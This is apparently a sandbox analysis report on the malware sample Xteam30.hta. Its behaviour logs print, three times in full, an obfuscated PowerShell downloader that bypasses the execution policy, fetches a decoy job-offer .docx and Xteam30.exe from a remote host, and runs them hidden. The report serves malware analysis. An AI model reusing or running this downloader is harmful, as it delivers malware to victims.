NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

cmdline

powershell.exe -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Nov. 7, 2024, 1 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo; filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 7, 2024, 1 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 7, 2024, 1 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\Xteam30.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

Xteam30.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All